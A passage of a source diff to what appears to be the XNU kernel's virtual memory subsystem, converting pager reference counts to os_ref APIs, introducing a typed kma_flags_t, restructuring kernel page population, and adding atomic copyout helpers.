(kr != KERN_SUCCESS) { + printf("corrupt_text_addr: pmap error %d\n", kr); + } + } else { + printf("corrupt_text_addr: object %p\n", object); + printf("corrupt_text_addr: offset 0x%llx\n", (uint64_t)offset); + printf("corrupt_text_addr: va 0x%llx\n", (uint64_t)va); + printf("corrupt_text_addr: vm_object_trunc_page(va) 0x%llx\n", (uint64_t)vm_object_trunc_page(va)); + printf("corrupt_text_addr: vm_page_t %p\n", page); + printf("corrupt_text_addr: ptoa(PHYS_PAGE) 0x%llx\n", (uint64_t)ptoa(VM_PAGE_GET_PHYS_PAGE(page))); + printf("corrupt_text_addr: using physaddr 0x%llx\n", (uint64_t)pa); + } + + if (object != VM_OBJECT_NULL) { + vm_object_unlock(object); + } + return kr; +} +#endif /* DEBUG || DEVELOPMENT */ diff --git a/osfmk/vm/vm_fourk_pager.c b/osfmk/vm/vm_fourk_pager.c index 73bfa3a24..d815d85a3 100644 --- a/osfmk/vm/vm_fourk_pager.c +++ 
b/osfmk/vm/vm_fourk_pager.c @@ -149,9 +149,13 @@ typedef struct fourk_pager { /* pager-specific data */ queue_chain_t pager_queue; /* next & prev pagers */ - unsigned int ref_count; /* reference count */ - int is_ready; /* is this pager ready ? */ - int is_mapped; /* is this mem_obj mapped ? */ +#if MEMORY_OBJECT_HAS_REFCOUNT +#define fourk_pgr_hdr_ref fourk_pgr_hdr.mo_ref +#else + os_ref_atomic_t fourk_pgr_hdr_ref; +#endif + bool is_ready; /* is this pager ready ? */ + bool is_mapped; /* is this mem_obj mapped ? */ struct fourk_pager_backing slots[FOURK_PAGER_SLOTS]; /* backing for each * 4K-chunk */ } *fourk_pager_t; @@ -322,8 +326,7 @@ fourk_pager_reference( pager = fourk_pager_lookup(mem_obj); lck_mtx_lock(&fourk_pager_lock); - assert(pager->ref_count > 0); - pager->ref_count++; + os_ref_retain_locked_raw(&pager->fourk_pgr_hdr_ref, NULL); lck_mtx_unlock(&fourk_pager_lock); } @@ -401,6 +404,7 @@ fourk_pager_deallocate_internal( { boolean_t needs_trimming; int count_unmapped; + os_ref_count_t ref_count; if (!locked) { lck_mtx_lock(&fourk_pager_lock); @@ -416,9 +420,9 @@ fourk_pager_deallocate_internal( } /* drop a reference on this pager */ - pager->ref_count--; + ref_count = os_ref_release_locked_raw(&pager->fourk_pgr_hdr_ref, NULL); - if (pager->ref_count == 1) { + if (ref_count == 1) { /* * Only the "named" reference is left, which means that * no one is really holding on to this pager anymore. @@ -428,7 +432,7 @@ fourk_pager_deallocate_internal( /* the pager is all ours: no need for the lock now */ lck_mtx_unlock(&fourk_pager_lock); fourk_pager_terminate_internal(pager); - } else if (pager->ref_count == 0) { + } else if (ref_count == 0) { /* * Dropped the existence reference; the memory object has * been terminated. 
Do some final cleanup and release the @@ -519,7 +523,7 @@ fourk_pager_map( lck_mtx_lock(&fourk_pager_lock); assert(pager->is_ready); - assert(pager->ref_count > 0); /* pager is alive */ + assert(os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) > 0); /* pager is alive */ if (pager->is_mapped == FALSE) { /* * First mapping of this pager: take an extra reference @@ -527,7 +531,7 @@ fourk_pager_map( * are removed. */ pager->is_mapped = TRUE; - pager->ref_count++; + os_ref_retain_locked_raw(&pager->fourk_pgr_hdr_ref, NULL); fourk_pager_count_mapped++; } lck_mtx_unlock(&fourk_pager_lock); @@ -586,7 +590,7 @@ fourk_pager_lookup( assert(mem_obj->mo_pager_ops == &fourk_pager_ops); pager = (fourk_pager_t) mem_obj; - assert(pager->ref_count > 0); + assert(os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) > 0); return pager; } @@ -616,7 +620,7 @@ fourk_pager_trim(void) prev_pager = (fourk_pager_t) queue_prev(&pager->pager_queue); - if (pager->ref_count == 2 && + if (os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) == 2 && pager->is_ready && !pager->is_mapped) { /* this pager can be trimmed */ @@ -652,13 +656,13 @@ fourk_pager_trim(void) pager_queue); pager->pager_queue.next = NULL; pager->pager_queue.prev = NULL; - assert(pager->ref_count == 2); + assert(os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) == 2); /* * We can't call deallocate_internal() because the pager * has already been dequeued, but we still need to remove * a reference. 
*/ - pager->ref_count--; + (void)os_ref_release_locked_raw(&pager->fourk_pgr_hdr_ref, NULL); fourk_pager_terminate_internal(pager); } } @@ -680,7 +684,7 @@ fourk_pager_to_vm_object( return VM_OBJECT_NULL; } - assert(pager->ref_count > 0); + assert(os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) > 0); assert(pager->fourk_pgr_hdr.mo_control != MEMORY_OBJECT_CONTROL_NULL); object = memory_object_control_to_vm_object(pager->fourk_pgr_hdr.mo_control); assert(object != VM_OBJECT_NULL); @@ -718,8 +722,8 @@ fourk_pager_create(void) pager->fourk_pgr_hdr.mo_pager_ops = &fourk_pager_ops; pager->fourk_pgr_hdr.mo_control = MEMORY_OBJECT_CONTROL_NULL; - pager->ref_count = 2; /* existence + setup reference */ - pager->is_ready = FALSE;/* not ready until it has a "name" */ + os_ref_init_count_raw(&pager->fourk_pgr_hdr_ref, NULL, 2); /* existence + setup reference */ + pager->is_ready = FALSE; /* not ready until it has a "name" */ pager->is_mapped = FALSE; for (i = 0; i < FOURK_PAGER_SLOTS; i++) { @@ -792,7 +796,7 @@ fourk_pager_data_request( pager = fourk_pager_lookup(mem_obj); assert(pager->is_ready); - assert(pager->ref_count > 1); /* pager is alive and mapped */ + assert(os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) > 1); /* pager is alive and mapped */ PAGER_DEBUG(PAGER_PAGEIN, ("fourk_pager_data_request: %p, %llx, %x, %x, pager %p\n", mem_obj, offset, length, protection_required, pager)); @@ -821,7 +825,7 @@ fourk_pager_data_request( retval = kr; goto done; } - dst_object = mo_control->moc_object; + dst_object = memory_object_control_to_vm_object(mo_control); assert(dst_object != VM_OBJECT_NULL); #if __x86_64__ || __arm__ || __arm64__ @@ -1289,7 +1293,7 @@ fourk_pager_populate( return KERN_INVALID_ARGUMENT; } - assert(pager->ref_count > 0); + assert(os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) > 0); assert(pager->fourk_pgr_hdr.mo_control != MEMORY_OBJECT_CONTROL_NULL); if (index < 0 || index > FOURK_PAGER_SLOTS) { diff --git a/osfmk/vm/vm_init.c b/osfmk/vm/vm_init.c 
index 8bd9c2378..11ef72463 100644 --- a/osfmk/vm/vm_init.c +++ b/osfmk/vm/vm_init.c @@ -87,9 +87,6 @@ const vm_offset_t vm_max_kernel_address = VM_MAX_KERNEL_ADDRESS; TUNABLE(bool, iokit_iomd_setownership_enabled, "iokit_iomd_setownership_enabled", true); -vm_offset_t kmapoff_kaddr; -unsigned int kmapoff_pgcnt; - static inline void vm_mem_bootstrap_log(const char *message) { @@ -105,7 +102,7 @@ __startup_func void vm_mem_bootstrap(void) { - vm_offset_t start, end; + vm_offset_t start, end, kmapoff_kaddr; /* * Initializes resident memory structures. @@ -125,6 +122,8 @@ vm_mem_bootstrap(void) vm_mem_bootstrap_log("vm_object_bootstrap"); vm_object_bootstrap(); + vm_retire_boot_pages(); + kernel_startup_initialize_upto(STARTUP_SUB_VM_KERNEL); vm_mem_bootstrap_log("vm_map_init"); @@ -144,10 +143,11 @@ vm_mem_bootstrap(void) * pointer packing schemes using KERNEL_PMAP_HEAP_RANGE_START as a base * do not admit this address to be part of any zone submap. */ - kmapoff_pgcnt = (early_random() & 0x1ff) + 1; /* 9 bits */ - if (vm_allocate_kernel(kernel_map, &kmapoff_kaddr, - kmapoff_pgcnt * PAGE_SIZE_64, VM_FLAGS_ANYWHERE, VM_KERN_MEMORY_OSFMK) != KERN_SUCCESS) { - panic("cannot vm_allocate %u kernel_map pages", kmapoff_pgcnt); + uint32_t kmapoff_pgcnt = (early_random() & 0x1ff) + 1; /* 9 bits */ + if (kernel_memory_allocate(kernel_map, &kmapoff_kaddr, + ptoa(kmapoff_pgcnt), 0, KMA_KOBJECT | KMA_PERMANENT | KMA_VAONLY, + VM_KERN_MEMORY_OSFMK) != KERN_SUCCESS) { + panic("cannot kernel_memory_allocate %u pages", kmapoff_pgcnt); } vm_mem_bootstrap_log("pmap_init"); diff --git a/osfmk/vm/vm_kern.c b/osfmk/vm/vm_kern.c index 8abf0275c..51dd4fe46 100644 --- a/osfmk/vm/vm_kern.c +++ b/osfmk/vm/vm_kern.c @@ -111,7 +111,7 @@ kmem_alloc_contig( vm_offset_t mask, ppnum_t max_pnum, ppnum_t pnum_mask, - int flags, + kma_flags_t flags, vm_tag_t tag) { vm_object_t object; @@ -252,8 +252,8 @@ kernel_memory_allocate( vm_offset_t *addrp, vm_size_t size, vm_offset_t mask, - int flags, - vm_tag_t 
tag) + kma_flags_t flags, + vm_tag_t tag) { vm_object_t object; vm_object_offset_t offset; @@ -268,14 +268,9 @@ kernel_memory_allocate( vm_page_t wired_page_list = NULL; int guard_page_count = 0; int wired_page_count = 0; - int page_grab_count = 0; - int i; int vm_alloc_flags; vm_map_kernel_flags_t vmk_flags; vm_prot_t kma_prot; -#if DEVELOPMENT || DEBUG - task_t task = current_task(); -#endif /* DEVELOPMENT || DEBUG */ if (startup_phase < STARTUP_SUB_KMEM) { panic("kernel_memory_allocate: VM is not ready"); @@ -349,64 +344,25 @@ kernel_memory_allocate( assert(wired_page_count * PAGE_SIZE_64 == fill_size); #if DEBUG || DEVELOPMENT - VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_START, size, 0, 0, 0); + VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_START, + size, 0, 0, 0); #endif - for (i = 0; i < guard_page_count; i++) { - for (;;) { - mem = vm_page_grab_guard(); - - if (mem != VM_PAGE_NULL) { - break; - } - if (flags & KMA_NOPAGEWAIT) { - kr = KERN_RESOURCE_SHORTAGE; - goto out; - } - vm_page_more_fictitious(); + for (int i = 0; i < guard_page_count; i++) { + mem = vm_page_grab_guard((flags & KMA_NOPAGEWAIT) == 0); + if (mem == VM_PAGE_NULL) { + kr = KERN_RESOURCE_SHORTAGE; + goto out; } mem->vmp_snext = guard_page_list; guard_page_list = mem; } if (!(flags & (KMA_VAONLY | KMA_PAGEABLE))) { - for (i = 0; i < wired_page_count; i++) { - for (;;) { - if (flags & KMA_LOMEM) { - mem = vm_page_grablo(); - } else { - mem = vm_page_grab(); - } - - if (mem != VM_PAGE_NULL) { - break; - } - - if (flags & KMA_NOPAGEWAIT) { - kr = KERN_RESOURCE_SHORTAGE; - goto out; - } - if ((flags & KMA_LOMEM) && (vm_lopage_needed == TRUE)) { - kr = KERN_RESOURCE_SHORTAGE; - goto out; - } - - /* VM privileged threads should have waited in vm_page_grab() and not get here. 
*/ - assert(!(current_thread()->options & TH_OPT_VMPRIV)); - - uint64_t unavailable = (vm_page_wire_count + vm_page_free_target) * PAGE_SIZE; - if (unavailable > max_mem || map_size > (max_mem - unavailable)) { - kr = KERN_RESOURCE_SHORTAGE; - goto out; - } - VM_PAGE_WAIT(); - } - page_grab_count++; - if (KMA_ZERO & flags) { - vm_page_zero_fill(mem); - } - mem->vmp_snext = wired_page_list; - wired_page_list = mem; + kr = vm_page_alloc_list(wired_page_count, flags, + &wired_page_list); + if (kr != KERN_SUCCESS) { + goto out; } } @@ -580,12 +536,9 @@ kernel_memory_allocate( } #if DEBUG || DEVELOPMENT - VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, page_grab_count, 0, 0, 0); - if (task != NULL) { - ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_grab_count); - } + VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, + wired_page_count, 0, 0, 0); #endif - /* * Return the memory, not zeroed. */ @@ -602,141 +555,32 @@ out: } #if DEBUG || DEVELOPMENT - VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, page_grab_count, 0, 0, 0); - if (task != NULL && kr == KERN_SUCCESS) { - ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_grab_count); - } + VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, + wired_page_count, 0, 0, 0); #endif - return kr; } -kern_return_t -kernel_memory_populate( +void +kernel_memory_populate_with_pages( vm_map_t map, vm_offset_t addr, vm_size_t size, - int flags, + vm_page_t page_list, + kma_flags_t flags, vm_tag_t tag) { - vm_object_t object; - vm_object_offset_t offset, pg_offset; - kern_return_t kr, pe_result; - vm_page_t mem; - vm_page_t page_list = NULL; - int page_count = 0; - int page_grab_count = 0; - int i; - -#if DEBUG || DEVELOPMENT - task_t task = current_task(); - VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_START, size, 0, 0, 0); -#endif - - page_count = (int) (size / PAGE_SIZE_64); - - 
assert((flags & (KMA_COMPRESSOR | KMA_KOBJECT)) != (KMA_COMPRESSOR | KMA_KOBJECT)); + vm_object_t object; + kern_return_t pe_result; + vm_page_t mem; + int page_count = atop_64(size); if (flags & KMA_COMPRESSOR) { - pg_offset = page_count * PAGE_SIZE_64; - - do { - for (;;) { - mem = vm_page_grab(); - - if (mem != VM_PAGE_NULL) { - break; - } - - VM_PAGE_WAIT(); - } - page_grab_count++; - if (KMA_ZERO & flags) { - vm_page_zero_fill(mem); - } - mem->vmp_snext = page_list; - page_list = mem; - - pg_offset -= PAGE_SIZE_64; - - kr = pmap_enter_options(kernel_pmap, - addr + pg_offset, VM_PAGE_GET_PHYS_PAGE(mem), - VM_PROT_READ | VM_PROT_WRITE, VM_PROT_NONE, 0, TRUE, - PMAP_OPTIONS_INTERNAL, NULL); - assert(kr == KERN_SUCCESS); - } while (pg_offset); - - offset = addr; - object = compressor_object; - - vm_object_lock(object); - - for (pg_offset = 0; - pg_offset < size; - pg_offset += PAGE_SIZE_64) { - mem = page_list; - page_list = mem->vmp_snext; - mem->vmp_snext = NULL; - - vm_page_insert(mem, object, offset + pg_offset); - assert(mem->vmp_busy); - - mem->vmp_busy = FALSE; - mem->vmp_pmapped = TRUE; - mem->vmp_wpmapped = TRUE; - mem->vmp_q_state = VM_PAGE_USED_BY_COMPRESSOR; - } - vm_object_unlock(object); - -#if KASAN - if (map == compressor_map) { - kasan_notify_address_nopoison(addr, size); - } else { - kasan_notify_address(addr, size); - } -#endif - -#if DEBUG || DEVELOPMENT - VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, page_grab_count, 0, 0, 0); - if (task != NULL) { - ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_grab_count); - } -#endif - return KERN_SUCCESS; + panic("%s(%p,0x%llx,0x%llx,0x%x): KMA_COMPRESSOR", __func__, + map, (uint64_t) addr, (uint64_t) size, flags); } - for (i = 0; i < page_count; i++) { - for (;;) { - if (flags & KMA_LOMEM) { - mem = vm_page_grablo(); - } else { - mem = vm_page_grab(); - } - - if (mem != VM_PAGE_NULL) { - break; - } - - if (flags & KMA_NOPAGEWAIT) { - kr = 
KERN_RESOURCE_SHORTAGE; - goto out; - } - if ((flags & KMA_LOMEM) && - (vm_lopage_needed == TRUE)) { - kr = KERN_RESOURCE_SHORTAGE; - goto out; - } - VM_PAGE_WAIT(); - } - page_grab_count++; - if (KMA_ZERO & flags) { - vm_page_zero_fill(mem); - } - mem->vmp_snext = page_list; - page_list = mem; - } if (flags & KMA_KOBJECT) { - offset = addr; object = kernel_object; vm_object_lock(object); @@ -749,16 +593,15 @@ kernel_memory_populate( * take reference on object; * unlock map; */ - panic("kernel_memory_populate(%p,0x%llx,0x%llx,0x%x): " - "!KMA_KOBJECT", + panic("%s(%p,0x%llx,0x%llx,0x%x): !KMA_KOBJECT", __func__, map, (uint64_t) addr, (uint64_t) size, flags); } - for (pg_offset = 0; + for (vm_object_offset_t pg_offset = 0; pg_offset < size; pg_offset += PAGE_SIZE_64) { if (page_list == NULL) { - panic("kernel_memory_populate: page_list == NULL"); + panic("%s: page_list too short", __func__); } mem = page_list; @@ -768,11 +611,11 @@ kernel_memory_populate( assert(mem->vmp_q_state == VM_PAGE_NOT_ON_Q); mem->vmp_q_state = VM_PAGE_IS_WIRED; mem->vmp_wire_count++; - if (__improbable(mem->vmp_wire_count == 0)) { - panic("kernel_memory_populate(%p): wire_count overflow", mem); + if (mem->vmp_wire_count == 0) { + panic("%s(%p): wire_count overflow", __func__, mem); } - vm_page_insert_wired(mem, object, offset + pg_offset, tag); + vm_page_insert_wired(mem, object, addr + pg_offset, tag); mem->vmp_busy = FALSE; mem->vmp_pmapped = TRUE; @@ -799,23 +642,19 @@ kernel_memory_populate( assert(pe_result == KERN_SUCCESS); if (flags & KMA_NOENCRYPT) { - bzero(CAST_DOWN(void *, (addr + pg_offset)), PAGE_SIZE); + __nosan_bzero(CAST_DOWN(void *, (addr + pg_offset)), PAGE_SIZE); pmap_set_noencrypt(VM_PAGE_GET_PHYS_PAGE(mem)); } } + if (page_list) { + panic("%s: page_list too long", __func__); + } vm_object_unlock(object); vm_page_lockspin_queues(); vm_page_wire_count += page_count; vm_page_unlock_queues(); - vm_tag_update_size(tag, ptoa_64(page_count)); - -#if DEBUG || DEVELOPMENT - 
VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, page_grab_count, 0, 0, 0); - if (task != NULL) { - ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_grab_count); - } -#endif + vm_tag_update_size(tag, size); #if KASAN if (map == compressor_map) { @@ -824,20 +663,106 @@ kernel_memory_populate( kasan_notify_address(addr, size); } #endif - return KERN_SUCCESS; +} -out: - if (page_list) { - vm_page_free_list(page_list, FALSE); - } +kern_return_t +kernel_memory_populate( + vm_map_t map, + vm_offset_t addr, + vm_size_t size, + kma_flags_t flags, + vm_tag_t tag) +{ + vm_object_t object; + vm_object_offset_t offset, pg_offset; + kern_return_t kr = KERN_SUCCESS; + vm_page_t mem; + vm_page_t page_list = NULL; + int page_count = atop_64(size); #if DEBUG || DEVELOPMENT - VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, page_grab_count, 0, 0, 0); - if (task != NULL && kr == KERN_SUCCESS) { - ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_grab_count); - } + VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_START, + size, 0, 0, 0); #endif + assert((flags & (KMA_COMPRESSOR | KMA_KOBJECT)) != (KMA_COMPRESSOR | KMA_KOBJECT)); + + if (flags & KMA_COMPRESSOR) { + pg_offset = page_count * PAGE_SIZE_64; + + do { + for (;;) { + mem = vm_page_grab(); + + if (mem != VM_PAGE_NULL) { + break; + } + + VM_PAGE_WAIT(); + } + if (KMA_ZERO & flags) { + vm_page_zero_fill(mem); + } + mem->vmp_snext = page_list; + page_list = mem; + + pg_offset -= PAGE_SIZE_64; + + kr = pmap_enter_options(kernel_pmap, + addr + pg_offset, VM_PAGE_GET_PHYS_PAGE(mem), + VM_PROT_READ | VM_PROT_WRITE, VM_PROT_NONE, 0, TRUE, + PMAP_OPTIONS_INTERNAL, NULL); + assert(kr == KERN_SUCCESS); + } while (pg_offset); + + offset = addr; + object = compressor_object; + + vm_object_lock(object); + + for (pg_offset = 0; + pg_offset < size; + pg_offset += PAGE_SIZE_64) { + mem = page_list; + page_list = mem->vmp_snext; + mem->vmp_snext = 
NULL; + + vm_page_insert(mem, object, offset + pg_offset); + assert(mem->vmp_busy); + + mem->vmp_busy = FALSE; + mem->vmp_pmapped = TRUE; + mem->vmp_wpmapped = TRUE; + mem->vmp_q_state = VM_PAGE_USED_BY_COMPRESSOR; + } + vm_object_unlock(object); + +#if KASAN + if (map == compressor_map) { + kasan_notify_address_nopoison(addr, size); + } else { + kasan_notify_address(addr, size); + } +#endif + +#if DEBUG || DEVELOPMENT + task_t task = current_task(); + if (task != NULL) { + ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_count); + } +#endif + } else { + kr = vm_page_alloc_list(page_count, flags, &page_list); + if (kr == KERN_SUCCESS) { + kernel_memory_populate_with_pages(map, addr, size, + page_list, flags, tag); + } + } + +#if DEBUG || DEVELOPMENT + VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, + page_count, 0, 0, 0); +#endif return kr; } @@ -847,7 +772,7 @@ kernel_memory_depopulate( vm_map_t map, vm_offset_t addr, vm_size_t size, - int flags, + kma_flags_t flags, vm_tag_t tag) { vm_object_t object; @@ -956,7 +881,7 @@ kmem_alloc_flags( vm_offset_t *addrp, vm_size_t size, vm_tag_t tag, - int flags) + kma_flags_t flags) { kern_return_t kr = kernel_memory_allocate(map, addrp, size, 0, flags, tag); if (kr == KERN_SUCCESS) { @@ -1596,6 +1521,68 @@ copyoutmap( return kr; } +/* + * Routine: copyoutmap_atomic{32, 64} + * Purpose: + * Like copyoutmap, except that the operation is atomic. + * Takes in value rather than *fromdata pointer. 
+ */ +kern_return_t +copyoutmap_atomic32( + vm_map_t map, + uint32_t value, + vm_map_address_t toaddr) +{ + kern_return_t kr = KERN_SUCCESS; + vm_map_t oldmap; + + if (vm_map_pmap(map) == pmap_kernel()) { + /* assume a correct toaddr */ + *(uint32_t *)toaddr = value; + } else if (current_map() == map) { + if (copyout_atomic32(value, toaddr) != 0) { + kr = KERN_INVALID_ADDRESS; + } + } else { + vm_map_reference(map); + oldmap = vm_map_switch(map); + if (copyout_atomic32(value, toaddr) != 0) { + kr = KERN_INVALID_ADDRESS; + } + vm_map_switch(oldmap); + vm_map_deallocate(map); + } + return kr; +} + +kern_return_t +copyoutmap_atomic64( + vm_map_t map, + uint64_t value, + vm_map_address_t toaddr) +{ + kern_return_t kr = KERN_SUCCESS; + vm_map_t oldmap; + + if (vm_map_pmap(map) == pmap_kernel()) { + /* assume a correct toaddr */ + *(uint64_t *)toaddr = value; + } else if (current_map() == map) { + if (copyout_atomic64(value, toaddr) != 0) { + kr = KERN_INVALID_ADDRESS; + } + } else { + vm_map_reference(map); + oldmap = vm_map_switch(map); + if (copyout_atomic64(value, toaddr) != 0) { + kr = KERN_INVALID_ADDRESS; + } + vm_map_switch(oldmap); + vm_map_deallocate(map); + } + return kr; +} + /* * * The following two functions are to be used when exposing kernel diff --git a/osfmk/vm/vm_kern.h b/osfmk/vm/vm_kern.h index 2cafcebe2..5dd4cfda6 100644 --- a/osfmk/vm/vm_kern.h +++ b/osfmk/vm/vm_kern.h @@ -80,31 +80,39 @@ extern "C" { #include +struct vm_page; + +__options_decl(kma_flags_t, uint32_t, { + KMA_NONE = 0x00000000, + KMA_HERE = 0x00000001, + KMA_NOPAGEWAIT = 0x00000002, + KMA_KOBJECT = 0x00000004, + KMA_LOMEM = 0x00000008, + KMA_GUARD_FIRST = 0x00000010, + KMA_GUARD_LAST = 0x00000020, + KMA_PERMANENT = 0x00000040, + KMA_NOENCRYPT = 0x00000080, + KMA_KSTACK = 0x00000100, + KMA_VAONLY = 0x00000200, + /* + * Pages belonging to the compressor are not on the paging queues, + * nor are they counted as wired. 
+ */ + KMA_COMPRESSOR = 0x00000400, + KMA_ATOMIC = 0x00000800, + KMA_ZERO = 0x00001000, + KMA_PAGEABLE = 0x00002000, + KMA_KHEAP = 0x00004000, /* Pages belonging to zones backing one of kalloc_heap. */ +}); + extern kern_return_t kernel_memory_allocate( vm_map_t map, vm_offset_t *addrp, vm_size_t size, vm_offset_t mask, - int flags, + kma_flags_t flags, vm_tag_t tag); -/* flags for kernel_memory_allocate */ -#define KMA_HERE 0x01 -#define KMA_NOPAGEWAIT 0x02 -#define KMA_KOBJECT 0x04 -#define KMA_LOMEM 0x08 -#define KMA_GUARD_FIRST 0x10 -#define KMA_GUARD_LAST 0x20 -#define KMA_PERMANENT 0x40 -#define KMA_NOENCRYPT 0x80 -#define KMA_KSTACK 0x100 -#define KMA_VAONLY 0x200 -#define KMA_COMPRESSOR 0x400 /* Pages belonging to the compressor are not on the paging queues, nor are they counted as wired. */ -#define KMA_ATOMIC 0x800 -#define KMA_ZERO 0x1000 -#define KMA_PAGEABLE 0x2000 -#define KMA_KHEAP 0x4000 /* Pages belonging to zones backing one of kalloc_heap. */ - extern kern_return_t kmem_alloc( vm_map_t map, vm_offset_t *addrp, @@ -118,7 +126,7 @@ extern kern_return_t kmem_alloc_contig( vm_offset_t mask, ppnum_t max_pnum, ppnum_t pnum_mask, - int flags, + kma_flags_t flags, vm_tag_t tag); extern kern_return_t kmem_alloc_flags( @@ -126,7 +134,7 @@ extern kern_return_t kmem_alloc_flags( vm_offset_t *addrp, vm_size_t size, vm_tag_t tag, - int flags); + kma_flags_t flags); extern kern_return_t kmem_alloc_pageable( vm_map_t map, @@ -169,18 +177,26 @@ extern kern_return_t kmem_alloc_kobject( vm_size_t size, vm_tag_t tag) __XNU_INTERNAL(kmem_alloc_kobject); +extern void kernel_memory_populate_with_pages( + vm_map_t map, + vm_offset_t addr, + vm_size_t size, + struct vm_page *page_list, + kma_flags_t flags, + vm_tag_t tag); + extern kern_return_t kernel_memory_populate( vm_map_t map, vm_offset_t addr, vm_size_t size, - int flags, + kma_flags_t flags, vm_tag_t tag); extern void kernel_memory_depopulate( vm_map_t map, vm_offset_t addr, vm_size_t size, - int flags, + 
kma_flags_t flags, vm_tag_t tag); extern kern_return_t memory_object_iopl_request( @@ -224,10 +240,8 @@ extern void vm_tag_update_size(vm_tag_t tag, int64_t size); #if VM_MAX_TAG_ZONES extern void vm_allocation_zones_init(void); -extern void vm_tag_will_update_zone(vm_tag_t tag, uint32_t zidx); -extern void vm_tag_update_zone_size(vm_tag_t tag, uint32_t zidx, int64_t delta, int64_t dwaste); - -extern vm_allocation_zone_total_t ** vm_allocation_zone_totals; +extern vm_tag_t vm_tag_will_update_zone(vm_tag_t tag, uint32_t zidx, uint32_t zflags); +extern void vm_tag_update_zone_size(vm_tag_t tag, uint32_t zidx, long delta); #endif /* VM_MAX_TAG_ZONES */ @@ -299,6 +313,16 @@ extern kern_return_t copyoutmap( vm_map_offset_t toaddr, vm_size_t length); +extern kern_return_t copyoutmap_atomic32( + vm_map_t map, + uint32_t value, + vm_map_offset_t toaddr); + +extern kern_return_t copyoutmap_atomic64( + vm_map_t map, + uint64_t value, + vm_map_offset_t toaddr); + extern kern_return_t kmem_alloc_external( vm_map_t map, vm_offset_t *addrp, diff --git a/osfmk/vm/vm_map.c b/osfmk/vm/vm_map.c index 436bd9368..abe95ed4a 100644 --- a/osfmk/vm/vm_map.c +++ b/osfmk/vm/vm_map.c @@ -63,7 +63,6 @@ * Virtual memory mapping module. */ -#include #include #include @@ -83,7 +82,7 @@ #include #include -#include +#include #include #include #include @@ -298,7 +297,6 @@ static kern_return_t vm_map_remap_extract( vm_map_t map, vm_map_offset_t addr, vm_map_size_t size, - vm_prot_t required_protection, boolean_t copy, struct vm_map_header *map_header, vm_prot_t *cur_protection, @@ -693,12 +691,16 @@ vm_map_copy_require(struct vm_map_copy *copy) } /* - * Placeholder object for submap operations. This object is dropped - * into the range by a call to vm_map_find, and removed when - * vm_map_submap creates the submap. + * vm_map_require: + * + * Ensures that the argument is memory allocated from the genuine + * vm map zone. (See zone_id_require_allow_foreign). 
*/ - -vm_object_t vm_submap_object; +void +vm_map_require(vm_map_t map) +{ + zone_id_require_allow_foreign(ZONE_ID_VM_MAP, sizeof(struct _vm_map), map); +} static __startup_data vm_offset_t map_data; static __startup_data vm_size_t map_data_size; @@ -787,6 +789,7 @@ vm_map_apple_protected( vm_object_offset_t crypto_start, crypto_end; int vm_flags; vm_map_kernel_flags_t vmk_flags; + boolean_t cache_pager; vm_flags = 0; vmk_flags = VM_MAP_KERNEL_FLAGS_NONE; @@ -888,6 +891,13 @@ vm_map_apple_protected( crypto_backing_offset = VME_OFFSET(&tmp_entry); } + cache_pager = TRUE; +#if XNU_TARGET_OS_OSX + if (vm_map_is_alien(map)) { + cache_pager = FALSE; + } +#endif /* XNU_TARGET_OS_OSX */ + /* * Lookup (and create if necessary) the protected memory object * matching that VM object. @@ -901,7 +911,8 @@ vm_map_apple_protected( crypto_backing_offset, crypt_info, crypto_start, - crypto_end); + crypto_end, + cache_pager); /* release extra ref on protected object */ vm_object_deallocate(protected_object); @@ -1042,8 +1053,8 @@ vm_map_init(void) sizeof(debug4k_filter)); #endif /* MACH_ASSERT */ - vm_map_zone = zone_create(VM_MAP_ZONE_NAME, sizeof(struct _vm_map), - VM_MAP_ZFLAGS); + vm_map_zone = zone_create_ext(VM_MAP_ZONE_NAME, sizeof(struct _vm_map), + VM_MAP_ZFLAGS, ZONE_ID_VM_MAP, NULL); vm_map_entry_zone = zone_create(mez_name, sizeof(struct vm_map_entry), ZC_NOENCRYPT | ZC_NOGZALLOC | ZC_NOCALLOUT); @@ -1054,9 +1065,7 @@ vm_map_init(void) */ vm_map_entry_reserved_zone = zone_create_ext(VME_RESERVED_ZONE_NAME, sizeof(struct vm_map_entry), VM_MAP_RESERVED_ZFLAGS, - ZONE_ID_ANY, ^(zone_t z) { - zone_set_noexpand(z, 64 * kentry_data_size); - }); + ZONE_ID_ANY, NULL); vm_map_copy_zone = zone_create_ext("VM map copies", sizeof(struct vm_map_copy), ZC_NOENCRYPT | ZC_CACHING, ZONE_ID_VM_MAP_COPY, NULL); @@ -1067,9 +1076,9 @@ vm_map_init(void) /* * Add the stolen memory to zones, adjust zone size and stolen counts. 
